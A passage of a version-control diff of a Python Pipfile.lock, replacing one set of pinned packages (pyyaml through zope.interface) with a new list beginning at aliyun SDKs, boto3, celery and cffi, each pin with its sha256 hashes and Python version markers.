"sha256:d2b04aac4d386b172d5b9692e2d2da8de7bfb6c387fa4f801fbf6fb2e6ba4673", - "sha256:d858aa552c999bc8a8d57426ed01e40bef403cd8ccdd0fc5f6f04a00414cac2a", - "sha256:f003ed9ad21d6a4713f0a9b5a7a0a79e08dd0f221aff4525a2be4c346ee60aab", - "sha256:f22ac1c3cac4dbc50079e965eba2c1058622631e526bd9afd45fedd49ba781fa", - "sha256:faca3bdcf85b2fc05d06ff3fbc1f83e1391b3e724afa3feba7d13eeab355484c", - "sha256:fca0e3a251908a499833aa292323f32437106001d436eca0e6e7833256674585", - "sha256:fd1592b3fdf65fff2ad0004b5e363300ef59ced41c2e6b3a99d4089fa8c5435d", - "sha256:fd66fc5d0da6d9815ba2cebeb4205f95818ff4b79c3ebe268e75d961704af52f" - ], - "markers": "python_version >= '3.6'", - "version": "==6.0.1" - }, - "redis": { - "hashes": [ - "sha256:68226f7ede928db8302f29ab088a157f41061fa946b7ae865452b6d7838bbffb", - "sha256:da92a39fec86438d3f1e2a1db33c312985806954fe860120b582a8430e231d8f" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==4.4.4" - }, - "requests": { - "hashes": [ - "sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f", - "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==2.31.0" - }, - "result": { - "hashes": [ - "sha256:c48c909e92181a075ba358228a3fe161e26d205dad416ad81f27f23515a5626d", - "sha256:d6a6258f32c057a4e0478999c6ce43dcadaf8ea435f58ac601ae2768f93ef243" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==0.8.0" - }, - "s3transfer": { - "hashes": [ - "sha256:b014be3a8a2aab98cfe1abc7229cc5a9a0cf05eb9c1f2b86b230fd8df3f78084", - "sha256:cab66d3380cca3e70939ef2255d01cd8aece6a4907a9528740f668c4b0611861" - ], - "markers": "python_version >= '3.7'", - "version": "==0.6.2" - }, - "scipy": { - "hashes": [ - "sha256:0f3261f14b767b316d7137c66cc4f33a80ea05841b9c87ad83a726205b901423", - "sha256:10eb6af2f751aa3424762948e5352f707b0dece77288206f227864ddf675aca0", - "sha256:1342ca385c673208f32472830c10110a9dcd053cf0c4b7d4cd7026d0335a6c1d", - "sha256:214cdf04bbae7a54784f8431f976704ed607c4bc69ba0d5d5d6a9df84374df76", - "sha256:2b997a5369e2d30c97995dcb29d638701f8000d04df01b8e947f206e5d0ac788", - "sha256:2c91cf049ffb5575917f2a01da1da082fd24ed48120d08a6e7297dfcac771dcd", - "sha256:3aeb87661de987f8ec56fa6950863994cd427209158255a389fc5aea51fa7055", - "sha256:4447ad057d7597476f9862ecbd9285bbf13ba9d73ce25acfa4e4b11c6801b4c9", - "sha256:542a757e2a6ec409e71df3d8fd20127afbbacb1c07990cb23c5870c13953d899", - "sha256:8d9886f44ef8c9e776cb7527fb01455bf4f4a46c455c4682edc2c2cc8cd78562", - "sha256:90d3b1364e751d8214e325c371f0ee0dd38419268bf4888b2ae1040a6b266b2a", - "sha256:95763fbda1206bec41157582bea482f50eb3702c85fffcf6d24394b071c0e87a", - "sha256:ac74b1512d38718fb6a491c439aa7b3605b96b1ed3be6599c17d49d6c60fca18", - "sha256:afdb0d983f6135d50770dd979df50bf1c7f58b5b33e0eb8cf5c73c70600eae1d", - "sha256:b0620240ef445b5ddde52460e6bc3483b7c9c750275369379e5f609a1050911c", - "sha256:b133f237bd8ba73bad51bc12eb4f2d84cbec999753bf25ba58235e9fc2096d80", - "sha256:b29318a5e39bd200ca4381d80b065cdf3076c7d7281c5e36569e99273867f61d", - "sha256:b8425fa963a32936c9773ee3ce44a765d8ff67eed5f4ac81dc1e4a819a238ee9", - "sha256:d2b813bfbe8dec6a75164523de650bad41f4405d35b0fa24c2c28ae07fcefb20", - "sha256:d690e1ca993c8f7ede6d22e5637541217fc6a4d3f78b3672a6fe454dbb7eb9a7", - "sha256:e367904a0fec76433bf3fbf3e85bf60dae8e9e585ffd21898ab1085a29a04d16", - "sha256:ea932570b1c2a30edafca922345854ff2cd20d43cd9123b6dacfdecebfc1a80b", - "sha256:f28f1f6cfeb48339c192efc6275749b2a25a7e49c4d8369a28b6591da02fbc9a", - "sha256:f73102f769ee06041a3aa26b5841359b1a93cc364ce45609657751795e8f4a4a", - "sha256:fa4909c6c20c3d91480533cddbc0e7c6d849e7d9ded692918c76ce5964997898" - ], - "markers": "python_version < '3.13' and python_version >= '3.9'", - "version": "==1.11.2" - }, - "setuptools": { - "hashes": [ - "sha256:d0b9a8433464d5800cbe05094acf5c6d52a91bfac9b52bcfc4d41382be5d5d31", - "sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==65.5.1" - }, - "shortuuid": { - "hashes": [ - "sha256:27ea8f28b1bd0bf8f15057a3ece57275d2059d2b0bb02854f02189962c13b6aa", - "sha256:fc75f2615914815a8e4cb1501b3a513745cb66ef0fd5fc6fb9f8c3fa3481f789" - ], - "index": "pypi", - "markers": "python_version >= '3.5'", - "version": "==1.0.11" - }, - "simhash": { - "hashes": [ - "sha256:49c5d81f31254f7e3f71dc2f5a245625c3d6143584478fdf4ffd2e63e4929366", - "sha256:533bc8cf41e4e6dd83f0b1847363516bf3323e0fa92e63d9e6df4e281e882e1b", - "sha256:634f41eb63d1c2dd1719459a859a985b2e0f2457670c9739c4d831a218409e8c", - "sha256:968de16c82c227a631aa00e57ab58f9e4ee9e47e8408486199a9eb59c1d6979b", - "sha256:a1dd9c4e2688fac260b5a810434326395bd23a566f5a8d5b9eac1336cc746d7f" - ], - "index": "pypi", - "version": "==2.1.2" - }, - "six": { - "hashes": [ - "sha256:30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259", - "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" - ], - "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", - "version": "==1.15.0" - }, - "sqlparse": { - "hashes": [ - "sha256:5430a4fe2ac7d0f93e66f1efc6e1338a41884b7ddf2a350cedd20ccc4d9d28f3", - "sha256:d446183e84b8349fa3061f0fe7f06ca94ba65b426946ffebe6e3e8295332420c" - ], - "markers": "python_version >= '3.5'", - "version": "==0.4.4" - }, - "tablib": { - "extras": ["html", "ods", "xls", "xlsx", "yaml"], - "hashes": [ - "sha256:9821caa9eca6062ff7299fa645e737aecff982e6b2b42046928a6413c8dabfd9", - "sha256:f6661dfc45e1d4f51fa8a6239f9c8349380859a5bfaa73280645f046d6c96e33" - ], - "markers": "python_version >= '3.8'", - "version": "==3.5.0" - }, - "tomli": { - "hashes": [ - "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc", - "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f" - ], - "markers": "python_version < '3.11'", - "version": "==2.0.1" - }, - "tornado": { - "hashes": [ - "sha256:1bd19ca6c16882e4d37368e0152f99c099bad93e0950ce55e71daed74045908f", - "sha256:22d3c2fa10b5793da13c807e6fc38ff49a4f6e1e3868b0a6f4164768bb8e20f5", - "sha256:502fba735c84450974fec147340016ad928d29f1e91f49be168c0a4c18181e1d", - "sha256:65ceca9500383fbdf33a98c0087cb975b2ef3bfb874cb35b8de8740cf7f41bd3", - "sha256:71a8db65160a3c55d61839b7302a9a400074c9c753040455494e2af74e2501f2", - "sha256:7ac51f42808cca9b3613f51ffe2a965c8525cb1b00b7b2d56828b8045354f76a", - "sha256:7d01abc57ea0dbb51ddfed477dfe22719d376119844e33c661d873bf9c0e4a16", - "sha256:805d507b1f588320c26f7f097108eb4023bbaa984d63176d1652e184ba24270a", - "sha256:9dc4444c0defcd3929d5c1eb5706cbe1b116e762ff3e0deca8b715d14bf6ec17", - "sha256:ceb917a50cd35882b57600709dd5421a418c29ddc852da8bcdab1f0db33406b0", - "sha256:e7d8db41c0181c80d76c982aacc442c0783a2c54d6400fe028954201a2e032fe" - ], - "markers": "python_version >= '3.8'", - "version": "==6.3.3" - }, - "types-awscrt": { - "hashes": [ - "sha256:0e31d7ba44e1898af37d224b94d28ffaef19baf89bb18ea2599de9ac0910a07f", - "sha256:eaef60422cf716b4ae216f164b74d679c82b0d9c53db380a37deb29ae5579b1b" - ], - "markers": "python_version >= '3.7' and python_version < '4.0'", - "version": "==0.19.0" - }, - "types-pymysql": { - "hashes": [ - "sha256:72bdaecb88de4a30bc3e1842e1d4522ceb3c4b2e883a6a2a7a7162775dd27b93", - "sha256:9aec9ee0453314d477ef26e5832b4a992bc4cc3557358d62b0fe4af760a7728f" - ], - "index": "pypi", - "version": "==1.1.0.1" - }, - "types-pyopenssl": { - "hashes": [ - "sha256:19536aa3debfbe25a918cf0d898e9f5fbbe6f3594a429da7914bf331deb1b342", - "sha256:6a010dac9ecd42b582d7dd2cc3e9e40486b79b3b64bb2fffba1474ff96af906d" - ], - "version": "==23.2.0.2" - }, - "types-python-dateutil": { - "hashes": [ - "sha256:1f4f10ac98bb8b16ade9dbee3518d9ace017821d94b057a425b069f834737f4b", - "sha256:f977b8de27787639986b4e28963263fd0e5158942b3ecef91b9335c130cb1ce9" - ], - "index": "pypi", - "version": "==2.8.19.14" - }, - "types-pytz": { - "hashes": [ - "sha256:1a7b8d4aac70981cfa24478a41eadfcd96a087c986d6f150d77e3ceb3c2bdfab", - "sha256:65152e872137926bb67a8fe6cc9cfd794365df86650c5d5fdc7b167b0f38892e" - ], - "version": "==2023.3.0.1" - }, - "types-pyyaml": { - "hashes": [ - "sha256:7d340b19ca28cddfdba438ee638cd4084bde213e501a3978738543e27094775b", - "sha256:a461508f3096d1d5810ec5ab95d7eeecb651f3a15b71959999988942063bf01d" - ], - "index": "pypi", - "version": "==6.0.12.11" - }, - "types-redis": { - "hashes": [ - "sha256:4f662060247a2363c7a8f0b7e52915d68960870ff16a749a891eabcf87ed0be4", - "sha256:5f179d10bd3ca995a8134aafcddfc3e12d52b208437c4529ef27e68acb301f38" - ], - "index": "pypi", - "version": "==4.6.0.5" - }, - "types-requests": { - "hashes": [ - "sha256:56d181c85b5925cbc59f4489a57e72a8b2166f18273fd8ba7b6fe0c0b986f12a", - "sha256:6aa3f7faf0ea52d728bb18c0a0d1522d9bfd8c72d26ff6f61bfc3d06a411cf40" - ], - "index": "pypi", - "version": "==2.31.0.2" - }, - "types-s3transfer": { - "hashes": [ - "sha256:1068877b6e59be5226fa3006ae64371ac9d5bc590dfdbd9c66fd0a075d3254ac", - "sha256:4ba9b483796fdcd026aa162ee03bdcedd2bf7d08e9387c820dcdd158b0102057" - ], - "markers": "python_version >= '3.7' and python_version < '4.0'", - "version": "==0.6.2" - }, - "types-urllib3": { - "hashes": [ - "sha256:229b7f577c951b8c1b92c1bc2b2fdb0b49847bd2af6d1cc2a2e3dd340f3bda8f", - "sha256:9683bbb7fb72e32bfe9d2be6e04875fbe1b3eeec3cbb4ea231435aa7fd6b4f0e" - ], - "index": "pypi", - "version": "==1.26.25.14" - }, - "typing-extensions": { - "hashes": [ - "sha256:440d5dd3af93b060174bf433bccd69b0babc3b15b1a8dca43789fd7f61514b36", - "sha256:b75ddc264f0ba5615db7ba217daeb99701ad295353c45f9e95963337ceeeffb2" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==4.7.1" - }, - "typing-inspect": { - "hashes": [ - "sha256:9ee6fc59062311ef8547596ab6b955e1b8aa46242d854bfc78f4f6b0eff35f9f", - "sha256:b23fc42ff6f6ef6954e4852c1fb512cdd18dbea03134f91f856a95ccc9461f78" - ], - "version": "==0.9.0" - }, - "tzdata": { - "hashes": [ - "sha256:11ef1e08e54acb0d4f95bdb1be05da659673de4acbd21bf9c69e94cc5e907a3a", - "sha256:7e65763eef3120314099b6939b5546db7adce1e7d6f2e179e3df563c70511eda" - ], - "markers": "python_version >= '2'", - "version": "==2023.3" - }, - "uritemplate": { - "hashes": [ - "sha256:4346edfc5c3b79f694bccd6d6099a322bbeb628dbf2cd86eea55a456ce5124f0", - "sha256:830c08b8d99bdd312ea4ead05994a38e8936266f84b9a7878232db50b044e02e" - ], - "markers": "python_version >= '3.6'", - "version": "==4.1.1" - }, - "urllib3": { - "hashes": [ - "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c", - "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" - ], - "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' and python_version < '4'", - "version": "==1.26.5" - }, - "uwsgi": { - "hashes": [ - "sha256:4cc4727258671ac5fa17ab422155e9aaef8a2008ebb86e4404b66deaae965db2" - ], - "index": "pypi", - "version": "==2.0.22" - }, - "uwsgitop": { - "hashes": [ - "sha256:99ca245119e4a0600840a62b7b4e020c9870fe90952b24eecfff0c9090c75d14" - ], - "index": "pypi", - "version": "==0.11" - }, - "vine": { - "hashes": [ - "sha256:4c9dceab6f76ed92105027c49c823800dd33cacce13bdedc5b914e3514b7fb30", - "sha256:7d3b1624a953da82ef63462013bbd271d3eb75751489f9807598e8f340bd637e" - ], - "markers": "python_version >= '3.6'", - "version": "==5.0.0" - }, - "wcwidth": { - "hashes": [ - "sha256:795b138f6875577cd91bba52baf9e445cd5118fd32723b460e30a0af30ea230e", - "sha256:a5220780a404dbe3353789870978e472cfe477761f06ee55077256e509b156d0" - ], - "version": "==0.2.6" - }, - "xlrd": { - "hashes": [ - "sha256:6a33ee89877bd9abc1158129f6e94be74e2679636b8a205b43b85206c3f0bbdd", - "sha256:f72f148f54442c6b056bf931dbc34f986fd0c3b0b6b5a58d013c9aef274d0c88" - ], - "version": "==2.0.1" - }, - "xlwt": { - "hashes": [ - "sha256:a082260524678ba48a297d922cc385f58278b8aa68741596a87de01a9c628b2e", - "sha256:c59912717a9b28f1a3c2a98fd60741014b06b043936dcecbc113eaaada156c88" - ], - "index": "pypi", - "version": "==1.3.0" - }, - "zope.event": { - "hashes": [ - "sha256:2832e95014f4db26c47a13fdaef84cef2f4df37e66b59d8f1f4a8f319a632c26", - "sha256:bac440d8d9891b4068e2b5a2c5e2c9765a9df762944bda6955f96bb9b91e67cd" - ], - "markers": "python_version >= '3.7'", - "version": "==5.0" - }, - "zope.interface": { - "hashes": [ - "sha256:042f2381118b093714081fd82c98e3b189b68db38ee7d35b63c327c470ef8373", - "sha256:0ec9653825f837fbddc4e4b603d90269b501486c11800d7c761eee7ce46d1bbb", - "sha256:12175ca6b4db7621aedd7c30aa7cfa0a2d65ea3a0105393e05482d7a2d367446", - "sha256:1592f68ae11e557b9ff2bc96ac8fc30b187e77c45a3c9cd876e3368c53dc5ba8", - "sha256:23ac41d52fd15dd8be77e3257bc51bbb82469cf7f5e9a30b75e903e21439d16c", - "sha256:424d23b97fa1542d7be882eae0c0fc3d6827784105264a8169a26ce16db260d8", - "sha256:4407b1435572e3e1610797c9203ad2753666c62883b921318c5403fb7139dec2", - "sha256:48f4d38cf4b462e75fac78b6f11ad47b06b1c568eb59896db5b6ec1094eb467f", - "sha256:4c3d7dfd897a588ec27e391edbe3dd320a03684457470415870254e714126b1f", - "sha256:5171eb073474a5038321409a630904fd61f12dd1856dd7e9d19cd6fe092cbbc5", - "sha256:5a158846d0fca0a908c1afb281ddba88744d403f2550dc34405c3691769cdd85", - "sha256:6ee934f023f875ec2cfd2b05a937bd817efcc6c4c3f55c5778cbf78e58362ddc", - "sha256:790c1d9d8f9c92819c31ea660cd43c3d5451df1df61e2e814a6f99cebb292788", - "sha256:809fe3bf1a91393abc7e92d607976bbb8586512913a79f2bf7d7ec15bd8ea518", - "sha256:87b690bbee9876163210fd3f500ee59f5803e4a6607d1b1238833b8885ebd410", - "sha256:89086c9d3490a0f265a3c4b794037a84541ff5ffa28bb9c24cc9f66566968464", - "sha256:99856d6c98a326abbcc2363827e16bd6044f70f2ef42f453c0bd5440c4ce24e5", - "sha256:aab584725afd10c710b8f1e6e208dbee2d0ad009f57d674cb9d1b3964037275d", - "sha256:af169ba897692e9cd984a81cb0f02e46dacdc07d6cf9fd5c91e81f8efaf93d52", - "sha256:b39b8711578dcfd45fc0140993403b8a81e879ec25d53189f3faa1f006087dca", - "sha256:b3f543ae9d3408549a9900720f18c0194ac0fe810cecda2a584fd4dca2eb3bb8", - "sha256:d0583b75f2e70ec93f100931660328965bb9ff65ae54695fb3fa0a1255daa6f2", - "sha256:dfbbbf0809a3606046a41f8561c3eada9db811be94138f42d9135a5c47e75f6f", - "sha256:e538f2d4a6ffb6edfb303ce70ae7e88629ac6e5581870e66c306d9ad7b564a58", - "sha256:eba51599370c87088d8882ab74f637de0c4f04a6d08a312dce49368ba9ed5c2a", - "sha256:ee4b43f35f5dc15e1fec55ccb53c130adb1d11e8ad8263d68b1284b66a04190d", - "sha256:f2363e5fd81afb650085c6686f2ee3706975c54f331b426800b53531191fdf28", - "sha256:f299c020c6679cb389814a3b81200fe55d428012c5e76da7e722491f5d205990", - "sha256:f72f23bab1848edb7472309e9898603141644faec9fd57a823ea6b4d1c4c8995", - "sha256:fa90bac61c9dc3e1a563e5babb3fd2c0c1c80567e815442ddbe561eadc803b30" - ], - "markers": "python_version >= '3.7'", - "version": "==6.0" - } - }, - "develop": {} + "_meta": { + "hash": { + "sha256": "6d3dc051e911275cbd5f9e72dcaa45bb784c95dd385f70fc2617a5dcb85cc0c2" + }, + "pipfile-spec": 6, + "requires": { + "python_version": "3.10" + }, + "sources": [ + { + "name": "pypi", + "url": "https://pypi.org/simple", + "verify_ssl": true + } + ] + }, + "default": { + "aliyun-python-sdk-core": { + "hashes": [ + "sha256:20bd54984fa316da700c7f355a51ab0b816690e2a0fcefb7b5ef013fed0da928" + ], + "version": "==2.13.36" + }, + "aliyun-python-sdk-core-v3": { + "hashes": [ + "sha256:d7df820fa31193be3f0a3a991c4126051900b3d2f09c0fc5ff7af43cf36ac245" + ], + "version": "==2.13.33" + }, + "aliyun-python-sdk-kms": { + "hashes": [ + "sha256:9bc39c693ba83944f5dfb871b118a2925eb8a5ee214dfcce61ee2ea3b6317ef1", + "sha256:a372737715682014bace68bd40fe83332f4fd925009a3eb110d41bc66f270e7a" + ], + "version": "==2.16.1" + }, + "amqp": { + "hashes": [ + "sha256:2c1b13fecc0893e946c65cbd5f36427861cffa4ea2201d8f6fca22e2a373b5e2", + "sha256:6f0956d2c23d8fa6e7691934d8c3930eadb44972cbbd1a7ae3a520f735d43359" + ], + "markers": "python_version >= '3.6'", + "version": "==5.1.1" + }, + "asgiref": { + "hashes": [ + "sha256:89b2ef2247e3b562a16eef663bc0e2e703ec6468e2fa8a5cd61cd449786d4f6e", + "sha256:9e0ce3aa93a819ba5b45120216b23878cf6e8525eb3848653452b4192b92afed" + ], + "index": "pypi", + "version": "==3.7.2" + }, + "async-timeout": { + "hashes": [ + "sha256:4640d96be84d82d02ed59ea2b7105a0f7b33abe8703703cd0ab0bf87c427522f", + "sha256:7405140ff1230c310e51dc27b3145b9092d659ce68ff733fb0cefe3ee42be028" + ], + "markers": "python_version >= '3.7'", + "version": "==4.0.3" + }, + "attrs": { + "hashes": [ + "sha256:1f28b4522cdc2fb4256ac1a020c78acf9cba2c6b461ccd2c126f3aa8e8335d04", + "sha256:6279836d581513a26f1bf235f9acd333bc9115683f14f7e8fae46c98fc50e015" + ], + "markers": "python_version >= '3.7'", + "version": "==23.1.0" + }, + "autopep8": { + "hashes": [ + "sha256:067959ca4a07b24dbd5345efa8325f5f58da4298dab0dde0443d5ed765de80cb", + "sha256:2913064abd97b3419d1cc83ea71f042cb821f87e45b9c88cad5ad3c4ea87fe0c" + ], + "markers": "python_version >= '3.6'", + "version": "==2.0.4" + }, + "billiard": { + "hashes": [ + "sha256:0f50d6be051c6b2b75bfbc8bfd85af195c5739c281d3f5b86a5640c65563614a", + "sha256:1ad2eeae8e28053d729ba3373d34d9d6e210f6e4d8bf0a9c64f92bd053f1edf5" + ], + "markers": "python_version >= '3.7'", + "version": "==4.1.0" + }, + "boto3": { + "hashes": [ + "sha256:34ab44146a2c4e7f4e72737f4b27e6eb5e0a7855c2f4599e3d9199b6a0a2d575", + "sha256:a50b4323f9579cfe22fcf5531fbd40b567d4d74c1adce06aeb5c95fce2a6fb40" + ], + "index": "pypi", + "version": "==1.24.59" + }, + "boto3-stubs": { + "hashes": [ + "sha256:68c9c5b88982aea2023225815cf4aef8ec8deeecce9b6225d2d71cfad2247a10", + "sha256:7fca135b829888dea640b13d1ba508e3b2c0c31135ca8b07a11dda0247067d37" + ], + "index": "pypi", + "version": "==1.28.35" + }, + "botocore": { + "hashes": [ + "sha256:1d6e97bd8653f732c7078b34aa2bb438e750898957e5a0a74b6c72918bc1d0f7", + "sha256:c8fac203a391cc2e4b682877bfce70e723e33c529b35b399a1d574605fbeb1af" + ], + "index": "pypi", + "version": "==1.27.91" + }, + "botocore-stubs": { + "hashes": [ + "sha256:19cf4813f717ebf112eeb8908c61385bce44163d5e827cc3debe5a6b63f4ef04", + "sha256:96858fb8bcf1f4413629b1f9484588e5d6bf3f9c20a37b2e760edf94f4b64c00" + ], + "index": "pypi", + "version": "==1.31.35" + }, + "celery": { + "hashes": [ + "sha256:0f104775617974c9a108857c883dd5a5b0a9058278bccf1881ff5d3317fa15ab", + "sha256:3afa81e7c6393097a4079badc11117ac20a1bf145c92ae5f1cc3ed24c2b1f165" + ], + "index": "pypi", + "version": "==5.3.0rc1" + }, + "celery-singleton": { + "hashes": [ + "sha256:260ce4978e631f8682ea0ccb03d7f3b87d42bc20e04e9bd46ddb78a2f8035d1e", + "sha256:76b30a1bbe31d42030924b3eecfcaae2ab3ab99bf43e607cd46437f012434420" + ], + "index": "pypi", + "version": "==0.3.1" + }, + "certifi": { + "hashes": [ + "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082", + "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9" + ], + "index": "pypi", + "version": "==2023.7.22" + }, + "cffi": { + "hashes": [ + "sha256:00a9ed42e88df81ffae7a8ab6d9356b371399b91dbdf0c3cb1e84c03a13aceb5", + "sha256:03425bdae262c76aad70202debd780501fabeaca237cdfddc008987c0e0f59ef", + "sha256:04ed324bda3cda42b9b695d51bb7d54b680b9719cfab04227cdd1e04e5de3104", + "sha256:0e2642fe3142e4cc4af0799748233ad6da94c62a8bec3a6648bf8ee68b1c7426", + "sha256:173379135477dc8cac4bc58f45db08ab45d228b3363adb7af79436135d028405", + "sha256:198caafb44239b60e252492445da556afafc7d1e3ab7a1fb3f0584ef6d742375", + "sha256:1e74c6b51a9ed6589199c787bf5f9875612ca4a8a0785fb2d4a84429badaf22a", + "sha256:2012c72d854c2d03e45d06ae57f40d78e5770d252f195b93f581acf3ba44496e", + "sha256:21157295583fe8943475029ed5abdcf71eb3911894724e360acff1d61c1d54bc", + "sha256:2470043b93ff09bf8fb1d46d1cb756ce6132c54826661a32d4e4d132e1977adf", + "sha256:285d29981935eb726a4399badae8f0ffdff4f5050eaa6d0cfc3f64b857b77185", + "sha256:30d78fbc8ebf9c92c9b7823ee18eb92f2e6ef79b45ac84db507f52fbe3ec4497", + "sha256:320dab6e7cb2eacdf0e658569d2575c4dad258c0fcc794f46215e1e39f90f2c3", + "sha256:33ab79603146aace82c2427da5ca6e58f2b3f2fb5da893ceac0c42218a40be35", + "sha256:3548db281cd7d2561c9ad9984681c95f7b0e38881201e157833a2342c30d5e8c", + "sha256:3799aecf2e17cf585d977b780ce79ff0dc9b78d799fc694221ce814c2c19db83", + "sha256:39d39875251ca8f612b6f33e6b1195af86d1b3e60086068be9cc053aa4376e21", + "sha256:3b926aa83d1edb5aa5b427b4053dc420ec295a08e40911296b9eb1b6170f6cca", + "sha256:3bcde07039e586f91b45c88f8583ea7cf7a0770df3a1649627bf598332cb6984", + "sha256:3d08afd128ddaa624a48cf2b859afef385b720bb4b43df214f85616922e6a5ac", + "sha256:3eb6971dcff08619f8d91607cfc726518b6fa2a9eba42856be181c6d0d9515fd", + "sha256:40f4774f5a9d4f5e344f31a32b5096977b5d48560c5592e2f3d2c4374bd543ee", + "sha256:4289fc34b2f5316fbb762d75362931e351941fa95fa18789191b33fc4cf9504a", + "sha256:470c103ae716238bbe698d67ad020e1db9d9dba34fa5a899b5e21577e6d52ed2", + "sha256:4f2c9f67e9821cad2e5f480bc8d83b8742896f1242dba247911072d4fa94c192", + "sha256:50a74364d85fd319352182ef59c5c790484a336f6db772c1a9231f1c3ed0cbd7", + "sha256:54a2db7b78338edd780e7ef7f9f6c442500fb0d41a5a4ea24fff1c929d5af585", + "sha256:5635bd9cb9731e6d4a1132a498dd34f764034a8ce60cef4f5319c0541159392f", + "sha256:59c0b02d0a6c384d453fece7566d1c7e6b7bae4fc5874ef2ef46d56776d61c9e", + "sha256:5d598b938678ebf3c67377cdd45e09d431369c3b1a5b331058c338e201f12b27", + "sha256:5df2768244d19ab7f60546d0c7c63ce1581f7af8b5de3eb3004b9b6fc8a9f84b", + "sha256:5ef34d190326c3b1f822a5b7a45f6c4535e2f47ed06fec77d3d799c450b2651e", + "sha256:6975a3fac6bc83c4a65c9f9fcab9e47019a11d3d2cf7f3c0d03431bf145a941e", + "sha256:6c9a799e985904922a4d207a94eae35c78ebae90e128f0c4e521ce339396be9d", + "sha256:70df4e3b545a17496c9b3f41f5115e69a4f2e77e94e1d2a8e1070bc0c38c8a3c", + "sha256:7473e861101c9e72452f9bf8acb984947aa1661a7704553a9f6e4baa5ba64415", + "sha256:8102eaf27e1e448db915d08afa8b41d6c7ca7a04b7d73af6514df10a3e74bd82", + "sha256:87c450779d0914f2861b8526e035c5e6da0a3199d8f1add1a665e1cbc6fc6d02", + "sha256:8b7ee99e510d7b66cdb6c593f21c043c248537a32e0bedf02e01e9553a172314", + "sha256:91fc98adde3d7881af9b59ed0294046f3806221863722ba7d8d120c575314325", + "sha256:94411f22c3985acaec6f83c6df553f2dbe17b698cc7f8ae751ff2237d96b9e3c", + "sha256:98d85c6a2bef81588d9227dde12db8a7f47f639f4a17c9ae08e773aa9c697bf3", + "sha256:9ad5db27f9cabae298d151c85cf2bad1d359a1b9c686a275df03385758e2f914", + "sha256:a0b71b1b8fbf2b96e41c4d990244165e2c9be83d54962a9a1d118fd8657d2045", + "sha256:a0f100c8912c114ff53e1202d0078b425bee3649ae34d7b070e9697f93c5d52d", + "sha256:a591fe9e525846e4d154205572a029f653ada1a78b93697f3b5a8f1f2bc055b9", + "sha256:a5c84c68147988265e60416b57fc83425a78058853509c1b0629c180094904a5", + "sha256:a66d3508133af6e8548451b25058d5812812ec3798c886bf38ed24a98216fab2", + "sha256:a8c4917bd7ad33e8eb21e9a5bbba979b49d9a97acb3a803092cbc1133e20343c", + "sha256:b3bbeb01c2b273cca1e1e0c5df57f12dce9a4dd331b4fa1635b8bec26350bde3", + "sha256:cba9d6b9a7d64d4bd46167096fc9d2f835e25d7e4c121fb2ddfc6528fb0413b2", + "sha256:cc4d65aeeaa04136a12677d3dd0b1c0c94dc43abac5860ab33cceb42b801c1e8", + "sha256:ce4bcc037df4fc5e3d184794f27bdaab018943698f4ca31630bc7f84a7b69c6d", + "sha256:cec7d9412a9102bdc577382c3929b337320c4c4c4849f2c5cdd14d7368c5562d", + "sha256:d400bfb9a37b1351253cb402671cea7e89bdecc294e8016a707f6d1d8ac934f9", + "sha256:d61f4695e6c866a23a21acab0509af1cdfd2c013cf256bbf5b6b5e2695827162", + "sha256:db0fbb9c62743ce59a9ff687eb5f4afbe77e5e8403d6697f7446e5f609976f76", + "sha256:dd86c085fae2efd48ac91dd7ccffcfc0571387fe1193d33b6394db7ef31fe2a4", + "sha256:e00b098126fd45523dd056d2efba6c5a63b71ffe9f2bbe1a4fe1716e1d0c331e", + "sha256:e229a521186c75c8ad9490854fd8bbdd9a0c9aa3a524326b55be83b54d4e0ad9", + "sha256:e263d77ee3dd201c3a142934a086a4450861778baaeeb45db4591ef65550b0a6", + "sha256:ed9cb427ba5504c1dc15ede7d516b84757c3e3d7868ccc85121d9310d27eed0b", + "sha256:fa6693661a4c91757f4412306191b6dc88c1703f780c8234035eac011922bc01", + "sha256:fcd131dd944808b5bdb38e6f5b53013c5aa4f334c5cad0c72742f6eba4b73db0" + ], + "index": "pypi", + "version": "==1.15.1" + }, + "chardet": { + "hashes": [ + "sha256:1b3b6ff479a8c414bc3fa2c0852995695c4a026dcd6d0633b2dd092ca39c1cf7", + "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970" + ], + "index": "pypi", + "version": "==5.2.0" + }, + "charset-normalizer": { + "hashes": [ + "sha256:04e57ab9fbf9607b77f7d057974694b4f6b142da9ed4a199859d9d4d5c63fe96", + "sha256:09393e1b2a9461950b1c9a45d5fd251dc7c6f228acab64da1c9c0165d9c7765c", + "sha256:0b87549028f680ca955556e3bd57013ab47474c3124dc069faa0b6545b6c9710", + "sha256:1000fba1057b92a65daec275aec30586c3de2401ccdcd41f8a5c1e2c87078706", + "sha256:1249cbbf3d3b04902ff081ffbb33ce3377fa6e4c7356f759f3cd076cc138d020", + "sha256:1920d4ff15ce893210c1f0c0e9d19bfbecb7983c76b33f046c13a8ffbd570252", + "sha256:193cbc708ea3aca45e7221ae58f0fd63f933753a9bfb498a3b474878f12caaad", + "sha256:1a100c6d595a7f316f1b6f01d20815d916e75ff98c27a01ae817439ea7726329", + 